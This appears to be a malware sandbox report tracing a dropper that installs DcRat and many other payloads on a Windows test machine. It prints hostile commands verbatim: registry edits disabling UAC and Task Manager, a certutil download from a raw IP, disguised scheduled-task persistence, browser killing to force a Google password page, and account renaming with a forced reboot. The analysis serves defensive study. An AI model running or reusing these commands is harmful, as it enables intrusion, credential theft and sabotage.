PID 4404 wrote to memory of 4780	4404	cmd.exe	reg.exe
PID 4404 wrote to memory of 3104	4404	cmd.exe	reg.exe
PID 4404 wrote to memory of 3104	4404	cmd.exe	reg.exe
PID 4404 wrote to memory of 2828	4404	cmd.exe	attrib.exe
PID 4404 wrote to memory of 2828	4404	cmd.exe	attrib.exe
PID 4404 wrote to memory of 4004	4404	cmd.exe	certutil.exe
PID 4404 wrote to memory of 4004	4404	cmd.exe	certutil.exe
PID 3936 wrote to memory of 4148	3936	4363463463464363463463463.exe	st.exe
PID 3936 wrote to memory of 4148	3936	4363463463464363463463463.exe	st.exe
PID 3936 wrote to memory of 2344	3936	4363463463464363463463463.exe	test18.exe
PID 3936 wrote to memory of 2344	3936	4363463463464363463463463.exe	test18.exe
PID 3936 wrote to memory of 848	3936	4363463463464363463463463.exe	DCRatBuild.exe
PID 3936 wrote to memory of 848	3936	4363463463464363463463463.exe	DCRatBuild.exe
PID 3936 wrote to memory of 848	3936	4363463463464363463463463.exe	DCRatBuild.exe
PID 3936 wrote to memory of 3836	3936	4363463463464363463463463.exe	Server.exe
PID 3936 wrote to memory of 3836	3936	4363463463464363463463463.exe	Server.exe
PID 3936 wrote to memory of 3836	3936	4363463463464363463463463.exe	Server.exe
PID 848 wrote to memory of 2532	848	DCRatBuild.exe	WScript.exe
PID 848 wrote to memory of 2532	848	DCRatBuild.exe	WScript.exe
PID 848 wrote to memory of 2532	848	DCRatBuild.exe	WScript.exe
PID 3836 wrote to memory of 4192	3836	Server.exe	server.exe
PID 3836 wrote to memory of 4192	3836	Server.exe	server.exe
PID 3836 wrote to memory of 4192	3836	Server.exe	server.exe
PID 2532 wrote to memory of 2736	2532	WScript.exe	cmd.exe
PID 2532 wrote to memory of 2736	2532	WScript.exe	cmd.exe
PID 2532 wrote to memory of 2736	2532	WScript.exe	cmd.exe
PID 2736 wrote to memory of 2396	2736	cmd.exe	agentServerFont.exe
PID 2736 wrote to memory of 2396	2736	cmd.exe	agentServerFont.exe
PID 2396 wrote to memory of 3152	2396	agentServerFont.exe	cmd.exe
PID 2396 wrote to memory of 3152	2396	agentServerFont.exe	cmd.exe
PID 2736 wrote to memory of 1784	2736	cmd.exe	reg.exe
PID 2736 wrote to memory of 1784	2736	cmd.exe	reg.exe
PID 2736 wrote to memory of 1784	2736	cmd.exe	reg.exe
PID 3152 wrote to memory of 4876	3152	cmd.exe	w32tm.exe
PID 3152 wrote to memory of 4876	3152	cmd.exe	w32tm.exe
PID 4192 wrote to memory of 5088	4192	server.exe	netsh.exe
PID 4192 wrote to memory of 5088	4192	server.exe	netsh.exe
PID 4192 wrote to memory of 5088	4192	server.exe	netsh.exe
PID 3152 wrote to memory of 3504	3152	cmd.exe	Registry.exe
PID 3152 wrote to memory of 3504	3152	cmd.exe	Registry.exe
PID 4404 wrote to memory of 2148	4404	cmd.exe	certutil.exe
PID 4404 wrote to memory of 2148	4404	cmd.exe	certutil.exe
PID 4404 wrote to memory of 3964	4404	cmd.exe	schtasks.exe
PID 4404 wrote to memory of 3964	4404	cmd.exe	schtasks.exe
PID 4404 wrote to memory of 4764	4404	cmd.exe	timeout.exe
PID 4404 wrote to memory of 4764	4404	cmd.exe	timeout.exe
PID 3936 wrote to memory of 840	3936	4363463463464363463463463.exe	exbuild.exe
PID 3936 wrote to memory of 840	3936	4363463463464363463463463.exe	exbuild.exe
PID 3936 wrote to memory of 840	3936	4363463463464363463463463.exe	exbuild.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2828 attrib.exe

pid	process
2828	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3296
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - DcRat
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3936
- - C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\975E.tmp\975F.tmp\9760.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
        5⤵
        Access Token Manipulation: Create Process with Token
        Suspicious use of WriteProcessMemory
        
        PID:4876
      - C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2520
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9933.tmp\9934.tmp\9935.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"
        7⤵
        Enumerates connected drives
        Suspicious use of WriteProcessMemory
        
        PID:4404
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:4836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:4780
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:3104
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h e:\net
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2828
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat
        8⤵
        
        PID:4004
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache * delete
        8⤵
        
        PID:2148
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f
        8⤵
        DcRat
        Scheduled Task/Job: Scheduled Task
        
        PID:3964
        
        C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 100
        8⤵
        Delays execution with timeout.exe
        
        PID:4764
- - C:\Users\Admin\AppData\Local\Temp\Files\st.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\st.exe"
    3⤵
    - Executes dropped EXE
    PID:4148
- - C:\Users\Admin\AppData\Local\Temp\Files\test18.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\test18.exe"
    3⤵
    - Executes dropped EXE
    PID:2344
- - C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:848
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Hyperruntimeperf\1BsDc3sv0Ug0mZu.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2532
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Hyperruntimeperf\vPQVVqEr.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2736
      - C:\Hyperruntimeperf\agentServerFont.exe
        
        "C:\Hyperruntimeperf\agentServerFont.exe"
        6⤵
        DcRat
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2396
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UHocbg4ojv.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3152
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:4876
        
        C:\Hyperruntimeperf\Registry.exe
        
        "C:\Hyperruntimeperf\Registry.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3504
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1784
- - C:\Users\Admin\AppData\Local\Temp\Files\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Server.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\server.exe
      "C:\Users\Admin\AppData\Local\Temp\server.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4192
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5088
- - C:\Users\Admin\AppData\Local\Temp\Files\exbuild.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\exbuild.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    PID:840
  - - C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
      "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4044
- - C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4404
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4828
    - - C:\Users\Admin\AppData\Local\Temp\3226925155.exe
        
        C:\Users\Admin\AppData\Local\Temp\3226925155.exe
        5⤵
        Executes dropped EXE
        
        PID:3748
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:2704
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:3664
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:3408
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:3380
    - - C:\Users\Admin\AppData\Local\Temp\1368212999.exe
        
        C:\Users\Admin\AppData\Local\Temp\1368212999.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3928
      - C:\Users\Admin\AppData\Local\Temp\2481835878.exe
        
        C:\Users\Admin\AppData\Local\Temp\2481835878.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        
        PID:220
    - - C:\Users\Admin\AppData\Local\Temp\315457734.exe
        
        C:\Users\Admin\AppData\Local\Temp\315457734.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3204
    - - C:\Users\Admin\AppData\Local\Temp\484530136.exe
        
        C:\Users\Admin\AppData\Local\Temp\484530136.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5008
      - C:\Users\Admin\AppData\Local\Temp\1648223512.exe
        
        C:\Users\Admin\AppData\Local\Temp\1648223512.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2400
- - C:\Users\Admin\AppData\Local\Temp\Files\Guide2018.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Guide2018.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 672 -s 352
      4⤵
      Program crash
      PID:2080
- - C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1108
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      4⤵
      PID:4576
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      4⤵
      PID:1016
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1060
      4⤵
      Program crash
      PID:6136
- - C:\Users\Admin\AppData\Local\Temp\Files\tdrp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tdrp.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3688
- - C:\Users\Admin\AppData\Local\Temp\Files\random.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4112
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:2108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:4016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:5216
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:5460
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5684
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:5696
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1940 -parentBuildID 20240401114208 -prefsHandle 1704 -prefMapHandle 1696 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {028de698-4d6e-4cfa-8aec-2dc9ccb73c35} 5696 "\\.\pipe\gecko-crash-server-pipe.5696" gpu
        6⤵
        
        PID:5900
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2416 -parentBuildID 20240401114208 -prefsHandle 2384 -prefMapHandle 2380 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f5fc5b7-18d6-4c78-b742-557439f098d0} 5696 "\\.\pipe\gecko-crash-server-pipe.5696" socket
        6⤵
        
        PID:6016
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2796 -childID 1 -isForBrowser -prefsHandle 2824 -prefMapHandle 3060 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b3e2561-6aee-4f53-a63a-a96130e8c5fb} 5696 "\\.\pipe\gecko-crash-server-pipe.5696" tab
        6⤵
        
        PID:5404
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3532 -childID 2 -isForBrowser -prefsHandle 3540 -prefMapHandle 3752 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94b8418c-4775-4f1d-bc5f-5f1f21e38cef} 5696 "\\.\pipe\gecko-crash-server-pipe.5696" tab
        6⤵
        
        PID:4312
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4572 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4412 -prefMapHandle 4408 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {706afed2-c056-49c6-b722-508907519717} 5696 "\\.\pipe\gecko-crash-server-pipe.5696" utility
        6⤵
        
        PID:552
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5264 -childID 3 -isForBrowser -prefsHandle 5192 -prefMapHandle 5180 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e6f429b-e6d3-45ff-b6eb-dc9ed9070ce0} 5696 "\\.\pipe\gecko-crash-server-pipe.5696" tab
        6⤵
        
        PID:1484
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5408 -childID 4 -isForBrowser -prefsHandle 5484 -prefMapHandle 5480 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7295c9d-ba6c-4544-9e38-61ff3b6f6aa2} 5696 "\\.\pipe\gecko-crash-server-pipe.5696" tab
        6⤵
        
        PID:3004
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5516 -childID 5 -isForBrowser -prefsHandle 5508 -prefMapHandle 5492 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {533ad2d0-c99a-47e2-a4c7-6fdaf8bde57e} 5696 "\\.\pipe\gecko-crash-server-pipe.5696" tab
        6⤵
        
        PID:576
- - C:\Users\Admin\AppData\Local\Temp\Files\000.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\000.exe"
    3⤵
    PID:2556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
      4⤵
      PID:196
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:5452
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:5636
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic useraccount where name='Admin' set FullName='UR NEXT'
        5⤵
        
        PID:5808
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic useraccount where name='Admin' rename 'UR NEXT'
        5⤵
        
        PID:5624
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown /f /r /t 0
        5⤵
        
        PID:5272
- - C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe"
    3⤵
    PID:808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
      4⤵
      PID:5388
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
        
        clamer.exe -priverdD
        5⤵
        
        PID:5440
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe"
        6⤵
        
        PID:5580
- - C:\Users\Admin\AppData\Local\Temp\Files\beacon.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\beacon.exe"
    3⤵
    PID:5384
- - C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe"
    3⤵
    PID:3932
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\JKJEHJKJEBGH" & exit
      4⤵
      PID:4780
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:5372
- - C:\Users\Admin\AppData\Local\Temp\Files\RDX123456.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\RDX123456.exe"
    3⤵
    PID:5324
- - C:\Users\Admin\AppData\Local\Temp\Files\o.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\o.exe"
    3⤵
    PID:2804
- - C:\Users\Admin\AppData\Local\Temp\Files\systems.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\systems.exe"
    3⤵
    PID:4756
- - C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe"
    3⤵
    PID:3744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 448
      4⤵
      Program crash
      PID:5260
- - C:\Users\Admin\AppData\Local\Temp\Files\client.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"
    3⤵
    PID:3644
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
      4⤵
      PID:5820
    - - C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
        
        "C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
        5⤵
        
        PID:5508
      - C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\System32\ipconfig.exe" /flushdns
        6⤵
        Gathers network information
        
        PID:5156
- - C:\Users\Admin\AppData\Local\Temp\Files\pyl64.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pyl64.exe"
    3⤵
    PID:3556
- - C:\Users\Admin\AppData\Local\Temp\Files\kill.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kill.exe"
    3⤵
    PID:5956
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:4196
- - C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe"
    3⤵
    PID:4500
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  PID:1060
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  PID:1996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4680
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:3444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2664
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:3740
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1172
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\SendWrite.rar"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Hyperruntimeperf\Registry.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Hyperruntimeperf\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Hyperruntimeperf\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\smss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\RuntimeBroker.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1344

C:\Windows\system32\schtasks.exe
